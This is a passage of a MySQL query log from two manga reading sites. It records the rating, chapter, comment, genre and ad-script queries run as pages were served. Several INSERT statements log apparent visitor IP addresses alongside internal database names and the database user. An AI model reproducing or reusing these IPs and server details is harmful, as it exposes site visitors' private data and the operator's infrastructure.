(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330645439 Quit 330645440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330645440 Quit 330645441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330645441 Quit 330645442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330645442 Quit 330645443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330645443 Quit 330645444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330645444 Quit 330645445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330645445 Quit 330645446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330645446 Quit 330645447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330645447 Quit 330645448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330645448 Quit 330645449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330645449 Quit 330645450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330645450 Quit 330645451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330645451 Quit 330645452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330645452 Quit 330645453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330645453 Quit 330645454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330645454 Quit 330645455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330645455 Quit 330645456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330645456 Quit 330645457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330645457 Quit 330645458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330645458 Quit 330645459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330645459 Quit 330645460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330645460 Quit 330645461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330645461 Quit 330645462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330645462 Quit 330645463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330645463 Quit 330645464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330645464 Quit 330645465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330645465 Quit 330645466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330645467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330645467 Quit 330645468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330645468 Quit 330645466 Quit 330645469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330645469 Quit 330645470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330645470 Quit 330645471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330645471 Quit 330645472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330645472 Quit 330645473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330645473 Quit 330645474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330645474 Quit 330645475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330645475 Quit 330645476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330645476 Quit 330645477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330645477 Quit 330645478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330645478 Quit 330645479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330645479 Quit 330645480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330645480 Quit 330645481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330645481 Quit 330645482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330645482 Quit 330645483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330645483 Quit 330645484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330645484 Quit 330645485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330645485 Quit 330645486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330645486 Quit 330645487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330645487 Quit 330645488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330645488 Quit 330645489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645489 Quit 330645490 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645490 Quit 260225 19:28:39 330645491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645491 Quit 330645492 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645492 Quit 330645493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645493 Quit 330645494 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7029' and m.active = 1 330645494 Quit 330645495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645495 Query select * FROM chapters where id = '7029' 330645495 Quit 330645496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645496 Query select * FROM chapters where manga_id = '183' order by display_priority ASC, id desc 330645496 Quit 330645497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645497 Query Update chapters set view=view+1 where id = '7029' 330645497 Quit 330645498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645498 Query select * FROM chapters where id = '7029' 330645499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645498 Quit 330645499 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7029' and m.active = 1 330645499 Quit 330645500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645500 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('183', '7029', '142.44.220.215', 'mangaberri.com', '2026-02-26 03:28:39', '2026-02-26 03:28:39') 330645500 Quit 330645501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645501 Query select * FROM chapter_images where chapter_id = '7029' 330645501 Quit 330645502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645502 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '183' and m.active = 1 330645502 Quit 330645503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645503 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='183' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Ecchi%' OR genres like '%Fantasy%') ORDER BY RAND() limit 10 330645503 Quit 330645504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645504 Quit 330645505 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645505 Quit 330645506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645506 Quit 330645507 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645507 Quit 330645508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645508 Quit 330645509 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645509 Quit 330645510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645510 Quit 330645511 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645511 Quit 260225 19:28:41 330645512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645512 Quit 330645513 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '348' and m.active = 1 330645513 Quit 330645514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645514 Query select * FROM chapters where id = '348' 330645514 Quit 330645515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645515 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330645515 Quit 330645516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645516 Query Update chapters set view=view+1 where id = '348' 330645516 Quit 330645517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645517 Query select * FROM chapters where id = '348' 330645518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645517 Quit 330645518 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '348' and m.active = 1 330645518 Quit 330645519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645519 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '348', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:28:41', '2026-02-26 03:28:41') 330645519 Quit 330645520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645520 Query select * FROM chapter_images where chapter_id = '348' 330645520 Quit 330645521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645521 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330645521 Quit 330645522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645522 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330645522 Quit 330645523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645523 Quit 330645524 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645524 Quit 330645525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645525 Quit 330645526 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645526 Quit 330645527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645527 Quit 330645528 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645528 Quit 330645529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645529 Quit 330645530 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645530 Quit 260225 19:28:42 330645531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645531 Quit 330645532 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330645532 Quit 330645533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645533 Query select * FROM chapters where id = '18101' 330645533 Quit 330645534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645534 Query select * FROM chapters where manga_id = '197' order by id desc 330645534 Quit 330645535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645535 Query Update chapters set view=view+1 where id = '18101' 330645535 Quit 330645536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645536 Query select * FROM chapters where id = '18101' 330645537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645537 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330645536 Quit 330645537 Quit 330645538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645538 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '18101', '134.97.129.25', 'mangacherri.com', '2026-02-26 03:28:42', '2026-02-26 03:28:42') 330645538 Quit 330645539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645539 Query select * FROM chapter_images where chapter_id = '18101' 330645539 Quit 330645540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645540 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330645541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645541 Quit 330645542 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12508' 330645540 Quit 330645543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645542 Quit 330645543 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330645544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645544 Query select * FROM chapters where id = '12508' 330645544 Quit 330645545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645545 Query select * FROM chapters where manga_id = '193' order by id desc 330645545 Quit 330645546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645546 Query Update chapters set view=view+1 where id = '12508' 330645547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645546 Quit 330645548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645548 Query select * FROM chapters where id = '12508' 330645549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645547 Quit 330645549 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'jujutsu-kaisen-jjk-manga-online' 330645550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645550 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12508' 330645548 Quit 330645550 Quit 330645551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645551 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12508', '205.164.158.33', '2026-02-26 03:28:42', '2026-02-26 03:28:42') 330645551 Quit 330645549 Quit 330645552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645552 Query select * FROM chapter_images where chapter_id = '12508' 330645553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645552 Quit 330645553 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330645554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645554 Quit 330645555 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330645555 Quit 330645556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645553 Quit 330645556 Query select * FROM chapters where manga_id = '193' order by id desc 330645557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645556 Quit 330645557 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330645558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645557 Quit 330645559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645558 Quit 330645559 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645560 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330645559 Quit 330645560 Quit 330645561 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645561 Query select * FROM comments where manga_id = '22' and parent_id is null order by created desc 330645561 Quit 330645562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645562 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330645562 Quit 330645563 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645563 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Demons%' OR m.genres like '%Drama%' OR m.genres like '%Magic%' OR m.genres like '%Martial Arts%' OR m.genres like '%School%' OR m.genres like '%Shounen%' OR m.genres like '%Super Power%' OR m.genres like '%Supernatural%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330645563 Quit 330645564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645564 Quit 330645565 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645565 Quit 330645566 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330645566 Quit 330645567 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645567 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330645567 Quit 330645568 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645568 Query select * FROM comments where parent_id = '4585' 330645568 Quit 330645569 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645569 Query select * FROM comments where parent_id = '4576' 330645569 Quit 330645570 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645570 Query select * FROM comments where parent_id = '4574' 330645570 Quit 330645571 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645571 Query select * FROM comments where parent_id = '4365' 330645571 Quit 330645572 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645572 Query select * FROM comments where parent_id = '4357' 330645572 Quit 330645573 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645573 Query select * FROM comments where parent_id = '4210' 330645573 Quit 330645574 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645574 Query select * FROM comments where parent_id = '3999' 330645574 Quit 330645575 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645575 Query select * FROM comments where parent_id = '3984' 330645575 Quit 330645576 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645576 Query select * FROM comments where parent_id = '3745' 330645576 Quit 330645577 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645577 Query select * FROM comments where parent_id = '3616' 330645577 Quit 330645578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645578 Query select * FROM comments where parent_id = '3489' 330645578 Quit 330645579 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645579 Query select * FROM comments where parent_id = '2944' 330645579 Quit 330645580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645580 Query select * FROM comments where parent_id = '2918' 330645580 Quit 330645581 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645581 Query select * FROM comments where parent_id = '2917' 330645581 Quit 330645582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645582 Query select * FROM comments where parent_id = '2880' 330645582 Quit 330645583 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645583 Query select * FROM comments where parent_id = '2879' 330645583 Quit 330645584 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645584 Query select * FROM comments where parent_id = '2878' 330645584 Quit 330645585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645585 Query select * FROM comments where parent_id = '2850' 330645585 Quit 330645586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645586 Query select * FROM comments where parent_id = '2724' 330645586 Quit 330645587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645587 Query select * FROM comments where parent_id = '2566' 330645587 Quit 330645588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645588 Query select * FROM comments where parent_id = '2556' 330645588 Quit 330645589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645589 Query select * FROM comments where parent_id = '2468' 330645589 Quit 330645590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645590 Query select * FROM comments where parent_id = '2467' 330645590 Quit 330645591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645591 Query select * FROM comments where parent_id = '2465' 330645591 Quit 330645592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645592 Query select * FROM comments where parent_id = '2466' 330645592 Quit 330645593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645593 Query select * FROM comments where parent_id = '2435' 330645593 Quit 330645594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645594 Query select * FROM comments where parent_id = '2299' 330645594 Quit 330645595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645595 Query select * FROM comments where parent_id = '2298' 330645595 Quit 330645596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645596 Query select * FROM comments where parent_id = '1661' 330645596 Quit 330645597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645597 Query select * FROM comments where parent_id = '1594' 330645597 Quit 330645598 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645598 Query select * FROM comments where parent_id = '1535' 330645598 Quit 330645599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645599 Query select * FROM comments where parent_id = '1534' 330645599 Quit 330645600 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645600 Query select * FROM comments where parent_id = '1457' 330645600 Quit 330645601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645601 Query select * FROM comments where parent_id = '1376' 330645601 Quit 330645602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645602 Query select * FROM comments where parent_id = '1356' 330645602 Quit 330645603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645603 Query select * FROM comments where parent_id = '1344' 330645603 Quit 330645604 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645604 Query select * FROM comments where parent_id = '1333' 330645604 Quit 330645605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645605 Query select * FROM comments where parent_id = '1325' 330645605 Quit 330645606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 